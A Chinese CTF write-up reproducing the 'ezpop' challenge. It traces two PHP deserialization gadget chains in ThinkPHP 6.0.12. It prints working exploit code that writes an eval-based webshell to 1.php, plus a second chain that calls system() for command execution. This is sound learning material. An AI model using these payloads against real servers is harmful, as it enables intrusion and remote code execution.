国赛ezpop题目复现(tp6)

最新推荐文章于 2023-06-30 14:17:51 发布
最新推荐文章于 2023-06-30 14:17:51 发布
阅读量665 收藏 1
点赞数 2
分类专栏: 代码审计 文章标签: 安全 php web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_62422842/article/details/125907905
版权

ThinkPHP 反序列化 漏洞分析 安全 代码审计
关键词由CSDN通过智能技术生成

前言

五月份国赛题目涉及到tp6的反序列化,当时也是在网上找的exp打,不知道其中的链子是怎么构造的,前段时间也接触了tp框架的反序列化,利用这次机会好好复现一下,弄懂其中的原理。在ctfshow和nssctf平台都有题目环境。那么废话不多说,开始复现。

题目复现

在题目中下载源码,搞个本地环境测试方便一些。本次复现两种链子,一种是写文件的,一种是直接rce的。

写文件

开头还是一样,直接找__destruct方法,这里选择的是AbstractCache类的销毁方法。

这里的autosave可控,继续跟进save方法。这里找到Adapter类的save方法,因为Adapter类是继承于AbstractCache类的。

这里我们需要进入到write方法,file是我们可控的,而contents是由getForStorage控制的,那就跟进这个函数。

cache属性我们可控,那么继续跟进cleanContents函数。

可以看出cleaned我们可控,最后进行josn编码一下,但是也相当于可控。那么write方法的两个参数都可控了,而且我们可以调用任意类的write方法,继续跟进write方法。

这里调用了Local类的write方法。发现是有一个file_put_contents危险函数的,看看它的两个参数是否可控,那么就可以写shell了。先看location参数,跟进applyPathPrefix函数,在它的父类中找到实现方法。

这里调用了getPathPrefix函数,继续跟进,

返回值我们可控,那么applyPathPrefix函数的返回值我们也可控,那么location的值我们也可控了。再看contents参数,它最终是由cache控制,也是可控的,那么就可以写shell了。那么编写exp

<?php
namespace League\Flysystem\Adapter;

class Local{

}

namespace League\Flysystem\Cached\Storage;
use League\Flysystem\Adapter\Local;
class Adapter {
    protected $adapter;
    protected $file;
    protected $cache = [];
    protected $autosave;
    public function __construct()
    {
        $this->adapter = new Local();
        $this->outosave = false;
        $this->file = '1.php';
        $this->cache = ['<?php eval($_POST[1]);?>'];
    }
}

echo urlencode(serialize(new Adapter()));
?>

就两个类,不是很复杂。在本地打一下payload,发现本地写入了1.php。

打开1.php,就是我们要写的shell了。

发现也能成功执行命令。

那么这个反序列化链就分析到这。

直接rce

上面那条链子是在可写的基础上能用,如果www目录没有写文件的权限呢?那么接下来的这条链子就能突出它的作用了。

首先调用Model类中的__destruct方法。

继续跟进save方法,

这个利用点在updataData方法里,那么我们需要绕过这个if判断,首先要满足isEmpty返回值为false,那么跟进这个函数,

 这里的data属性我们可控,那么这个函数的返回值我们也能够可控。再看trigger函数,Model类引用了ModelEvent类,那么就在这个类找函数实现定义。

默认就返回true,那么就可以绕过if了。 那就跟进updataData方法,

这里我们需要跟进checkAllowFields方法,这个方法是默认调用的。那么就继续跟进这个方法,

这里我们需要让它调用db函数,这里默认就会触发。继续跟进db函数,

这里属性table和属性suffix进行了一个字符串的拼接,如果把table属性实例化类,就可以触发tostring方法了。 全局搜索tostring方法,最终选择Conversion类里的tostring方法,

感觉与tp5有点相似啊,继续跟进toArray函数,

这里我们需要调用getAttr函数,只要满足data是一个数组就可以自动进入到elseif这个分支里。那么继续跟进getAttr函数,

这里调用了getValue方法,参数name源于key,可控,value由getdata函数控制,跟进这个函数,

这个函数返回值由getRealFieldName函数控制。 跟进这个函数

直接返回参数,所以filedName可控,data属性也可控,所以getData返回值也可控,那么value也是可控的。那就继续跟进getvalue方法。

getJsonValue方法是最终利用函数,那么继续跟进这个方法,

$closure和$value都可控,这里是不是就可以任意函数调用了。 exp为:

<?php
namespace think{
    abstract class Model{
        private $lazySave = false;
        private $data = [];
        private $exists = false;
        protected $table;
        private $withAttr = [];
        protected $json = [];
        protected $jsonAssoc = false;
        function __construct($obj = ''){
            $this->lazySave = True;
            $this->data = ['haha' => ['ls']];
            $this->exists = True;
            $this->table = $obj;
            $this->withAttr = ['haha' => ['system']];
            $this->json = ['haha',['w']];
            $this->jsonAssoc = True;
        }
    }
}
namespace think\model{
    use think\Model;
    class Pivot extends Model{
    }
}

namespace{
    echo urlencode(serialize(new think\model\Pivot(new think\model\Pivot())));
}
?>

exp简单说明:

这是在网上找的exp,为什么变量的赋值都在Model类中,因为Model类引用了Attribute类,那为什么最后new Pivot(new Pivot)这样new两次,因为要触发tostring方法,我们需要new Attribute类,但是Attribute类是trait定义的,不能直接实例化,这个关键字在我复现tp5.1说过,那么引用它的Model类又是一个抽象类,也不能实例化,所以说,顺藤摸瓜下来,只能去实例化继承了Model类的Pivot类了。至于这些变量的赋值操作,跟着调用链的参数情况应该能明白。最后还有命名空间的相关问题没弄太懂,之后查资料弄清楚。

结语

顺着这个题目,也抛砖引玉一下,对thinkphp6.0.12框架的反序列化链进行了一个分析。

相关文章:

ThinkPHP6.0.12LTS反序列漏洞分析 - FreeBuf网络安全行业门户

XiLitter
关注
  • 2
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
强网杯SQL题目复现php.zip
12-17
标签中的“强网杯SQL题目复现”再次强调这是为了解决特定竞赛中的SQL挑战。 【压缩包子文件的文件名称列表】: 1. README.md:这是一个Markdown格式的文档,通常包含项目简介、使用说明、安装步骤等内容,对于理解...
[MRCTF2020]Ezpop(详解)
pakho_C的博客
07-29 2365
将pop对象的参数source作为Show类的对象(此时source对象也有两个参数source和str),则会执行__toString()函数,returnsource对象的str参数的source,此时str如果是Test类的一个对象,则没有source参数,执行__toString()函数则会找不到source参数,就会调用Test类对象str的__get()函数。所以可以将参数p设置为Modifier类的对象,从而执行__invoke()函数,进而执行append函数。...
[MRCTF2020]Ezpop解析
06-30 271
魔法函数:当尝试以调用函数的方式调用一个对象时,__invoke() 方法会被自动调用。创建类对象时自动调用 当使用 new 操作符创建一个类的实例时,构造方法将会自动调用__toString() 会在需要转成字符串时, 会隐式自动调用它, 在PHP内部. 这个也是来自JAVA的当一个对象被当作一个字符串被调用。使用unserialize时触发__get() 用于从不可访问的属性读取数据 #难以访问包括:(1)私有属性,(2)没有初始化的属性。
BUUCTF [MRCTF2020]Ezpop 详解
lzu_lfl的博客
11-09 626
pop链
[MRCTF2020]Ezpop
FUCKING12的博客
01-01 206
先创建2个show对象a,b,在最后反序列化的时候$a=new Show()会调用__wakeup()函数,此时a->source是b,b此时是一个Show()对象,就会调用b里面__toString()方法,此时b里面的str是Test()对象,Test()对象没有source变量,便会调用Test()里面的__get()方法,将Test()类里面的p创建为Modifier(),然后就会调用Modifier()里面的__invoke()方法,执行append()函数,实现文件执行的功能。
buuctf-[MRCTF2020]Ezpop)(小宇特详解)
小宇的web博客
04-04 3131
buuctf-[MRCTF2020]Ezpop(小宇特详解) 1.先查看题目题目是eazypop,说明这道题是让构造简单的pop链 Welcome to index.php <?php //flag is in flag.php //WTF IS THIS? //Learn From https://ctf.ieki.xyz/library/php.html#%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E9%AD%94%E6%9C%AF%E6%96%B9%E6%B3%9
XYCTF部分web题目复现
最新发布
05-06
### XYCTF部分web题目复现 #### 一、PHP Web ezClass 题目解析 ##### 题目背景及分析 此题的核心在于理解并利用PHP中的原生类特性,通过构造特定的请求来执行系统命令或获取敏感信息。 - **题目代码**: ```php ...
2021年数学建模国赛一等奖论文模板
04-16
- **解析**:附录部分包含了一些辅助性的材料,如详细的计算过程、数据表格、代码等,这些内容虽然不在正文之中,但对于验证模型的有效性和复现研究结果至关重要。 综上所述,该模板不仅提供了一个规范化的写作...
【CTF】命令执行RCE
qq_53099119的博客
04-02 2666
md5() 函数计算字符串的 MD5 散列。md5() 函数使用 RSA 数据安全,包括 MD5 报文摘要算法。来自 RFC 1321 的解释 - MD5 报文摘要算法:MD5 报文摘要算法将任意长度的信息作为输入值,并将其换算成一个 128 位长度的"指纹信息"或"报文摘要"值来代表这个输入值,并以换算后的值作为结果。MD5 算法主要是为数字签名应用程序而设计的;
buuctf刷题11( | + su -c命令&<?=``;进行rce&tp6.0任意文件操作漏洞&prase_url()函数漏洞)
weixin_63231007的博客
02-06 2063
[羊城杯 2020]Easyphp2 & [红明谷CTF 2021]write_shell & [GYCTF2020]EasyThinking & [N1CTF 2018]eating_cms
[EIS2019]EzPOP--反序列化题目
Dream'
06-19 980
题目地址:https://buuoj.cn/challenges#[EIS%202019]EzPOP 发现代码中可利用点只有file_put_contents($filename, $data) ,所以我们从它开始倒推我们需要分别找到$data的链和$filename的链使options['data_compress']=false,不让$data压缩data来自value,$data = $this->serialize($value);,使options['serialize']=trim,这样se
TP6中读取数据库json数据输出遇到的问题
qq_19442899的博客
01-30 1515
当有以下需求时: 需要读取数据库中的json字段 取出后自动返回数组输出而非字符串 不想暴露字段名称,需要起一个别名 // 设置json类型字段,你需要将字段名称和别名一起加入 protected $json = ['val_text','conf']; // 设置JSON数据返回数组 protected $jsonAssoc = true; public function getConf($name){ return Conf::field('v
PHP使用traits实现代码复用
luyaran的博客
11-16 370
PHP5.4后新增traits实现代码复用机制,Trait和类相似,但不能被实例化,无需继承,只需要在类中使用关键词use引入即可,可引入多个Traits,用','隔开。 (1)Trait简单使用 php trait A { public $var1 = 'test1'; public function test1() { echo 'trait A::test1
tp6调试(trace)
qq_37805832的博客
06-11 1334
学会trace调试。在控制器中调试tp6自带的调试 三:效果: 谢谢大家的观看,谢谢。
Thinkphp6.0.x反序列化分析
cosmoslin的博客
02-24 1105
影响版本 Thinkphp6.0.0~6.0.2 环境搭建 Phpstudy: OS: Windows PHP: 7.3.4 ThinkPHP: 6.0.1 创建测试环境: composer create-projec topthink/think:6.0.* tp6.0.1 之后进入composer.json修改"topthink/framework": "6.0.1",再执行composer update 创建入口点: app/controller/Index.php <?php names
thinkphp5 mysql json_JSON字段
weixin_39662578的博客
01-30 493
本章内容为`V5.1.4+`版本开始支持,可以更为方便的操作模型的JSON数据字段。> 这里指的JSON数据包括JSON类型以及JSON格式(但并不是JSON类型字段)的数据我们修改下User模型类~~~namespace app\index\model;use think\Model;class User extends Model{// 设置json类型字段protected $json...
2022国赛Ezpop
m0_61448651的博客
07-27 217
2022国赛Ezpop
PHP反序列化CTF例题
bwxzdjn的博客
03-25 5916
用代码审计的方式分析一道典型的存在PHP反序列化漏洞的案例,加深对魔术方法等相关知识的理解。另外,还会和xss跨站脚本的知识进行融合。
ThinkPHP6模型中的获取器,修改器及搜索器的简单使用
m0_63622279的博客
05-21 2593
最常用的就是你的数据库中比如存放了某种状态信息,对应-1,1,2,实际的意思可能为不同的状态,删除,禁用,正常,待审核…搜索器的作用是用于封装字段(或者搜索标识)的查询条件表达式,一个搜索器对应一个特殊的方法(该方法必须是。获取器的作用是对模型实例的(原始)数据做出自动处理。最常见的就是往数据库插入数据时,比如说一些涉及金额的字段值,将你传入的值转换为浮点型…和获取器相反,修改器的主要作用是对模型设置的数据对象值进行处理。tips:当你定义获取器后,你想得到原始的数据信息,可以通过。方法来获取原始的数据。
yolov6代码复现
09-22
引用中提到了mmyolo框架的配置文件,这个框架可以方便地修改配置来改变模型。然而,mmyolo框架并没有提供Yolov6的voc实现配置,只有...但你可以参考Yolov5的实现配置,根据Yolov6的论文和代码来尝试自己复现Yolov6。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

XiLitter

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值